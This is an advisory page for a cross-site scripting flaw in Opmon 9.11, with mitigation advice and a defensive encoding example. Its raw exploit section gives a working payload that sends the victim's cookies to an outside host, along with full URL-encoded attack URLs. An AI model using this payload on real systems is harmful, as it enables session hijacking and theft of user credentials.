Vendor: Opmon
By: p3tryx
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross-site Scripting)
Product Name: Opmon
Affected Version From: 9.11
Affected Version To: 9.11
Patch Exists: YES
Related CVE: CVE-2021-43009
CPE: a:opservices:opmon:9.11
Platforms Tested: Chrome, IE, Firefox
2021

Opmon 9.11 – Cross-site Scripting

Opmon version 9.11 is vulnerable to cross-site scripting (XSS). An attacker can inject script code into certain input fields, and the victim's browser then executes it. This can lead to session hijacking, cookie theft, or other malicious activity.

Mitigation:

To mitigate this vulnerability, sanitize and validate all user input before displaying it on web pages. Content Security Policy (CSP) headers can also help prevent XSS attacks.
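
One way to apply the sanitize-and-validate advice to the `'};` prefix used in this advisory's proof of concept, as an added example that is not Opmon's code or the exploit author's. It assumes the search filter is reflected inside an inline script as a single-quoted string, which the prefix suggests but the page does not state; `renderNaive`, `renderHardened`, `jsLiteral` and `isValidSearch` are hypothetical names.

```javascript
// Added example with hypothetical names; not taken from Opmon.
// Assumption: the search filter value is echoed into an inline <script>
// as a single-quoted string inside an object literal.

// Constructed sample input, based on the decoded payload prefix on this page.
const SAMPLE = "'};<script>alert(document.cookie);</script>";

// Vulnerable pattern: raw concatenation into a JavaScript string literal.
// A quote in the input ends the string and the rest is parsed as markup/code.
function renderNaive(search) {
  return "<script>var filter = {search: '" + search + "'};</script>";
}

// Context-aware encoding for "JavaScript string inside an HTML script block":
// JSON.stringify handles quotes, backslashes and control characters; the
// replace() then escapes characters that matter to the HTML parser (< > &),
// the single quote, and the JS line separators U+2028/U+2029.
function jsLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Hardened rendering: the value can no longer close the string or the tag.
function renderHardened(search) {
  return "<script>var filter = {search: " + jsLiteral(search) + "};</script>";
}

// Input validation as a second layer: a search box for host names only
// needs a short allowlist of characters (the exact set is an assumption).
function isValidSearch(value) {
  return typeof value === "string" && /^[\w .:\-]{0,64}$/.test(value);
}

console.log("naive   :", renderNaive(SAMPLE));
console.log("hardened:", renderHardened(SAMPLE));
console.log("accepted by validation:", isValidSearch(SAMPLE));
```

Encoding must match the output context: HTML-entity escaping alone would not stop a quote from ending a JavaScript string, which is why the literal is built with `\uXXXX` escapes here.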

Exploit-DB raw data:

# Exploit Title: Opmon 9.11 - Cross-site Scripting
# Date: 2021-06-01
# Exploit Author: p3tryx
# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time
# Version: 9.11
# Tested on: Chrome, IE and Firefox
# CVE : CVE-2021-43009

# URL POC:

```
<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>
```

URL-encoded payload:

%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E

```
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};PAYLOAD&x=0&y=0

*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
&x=0&y=0

```